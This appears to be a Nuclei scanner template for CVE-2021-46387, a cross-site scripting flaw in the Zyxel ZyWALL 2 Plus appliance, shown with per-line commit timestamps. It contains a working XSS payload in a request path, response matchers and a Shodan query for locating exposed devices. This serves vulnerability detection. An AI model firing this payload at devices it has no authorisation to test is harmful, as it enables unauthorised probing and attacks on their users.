2022-04-01 09:43:57 +00:00
id : CVE-2021-46387
info :
name : Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting
author : DhiyaneshDk
severity : medium
2022-08-29 13:55:23 +00:00
description : ZyXEL ZyWALL 2 Plus Internet Security Appliance contains a cross-site scripting vulnerability. Insecure URI handling leads to bypass of security restrictions, which allows an attacker to execute arbitrary JavaScript codes to perform multiple attacks.
2022-04-01 09:43:57 +00:00
reference :
- https://www.exploit-db.com/exploits/50797
2022-05-17 09:18:12 +00:00
- https://www.zyxel.com/us/en/support/security_advisories.shtml
- https://drive.google.com/drive/folders/1_XfWBLqxT2Mqt7uB663Sjlc62pE8-rcN?usp=sharing
2022-08-29 13:55:23 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-46387
2022-04-02 07:59:47 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2022-04-02 07:59:47 +00:00
cve-id : CVE-2021-46387
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
epss-score : 0.00455
2022-04-22 10:38:41 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-04-22 10:38:41 +00:00
shodan-query : http.title:"Zywall2Plus"
2022-08-27 04:41:18 +00:00
tags : cve,cve2021,xss,zyxel,edb
2022-04-01 09:43:57 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-04-01 09:43:57 +00:00
- method : GET
path :
- '{{BaseURL}}/Forms/rpAuth_1?id=</form><iMg%20src=x%20onerror="prompt(document.domain)"><form>'
matchers-condition : and
matchers :
- type : word
part : body
words :
- '<iMg src=x onerror="prompt(document.domain)"><form>'
- 'Entry Error'
condition : and
- type : word
part : header
words :
- 'text/html'
- type : status
status :
- 200
2022-08-29 13:55:23 +00:00
# Enhanced by mp on 2022/08/28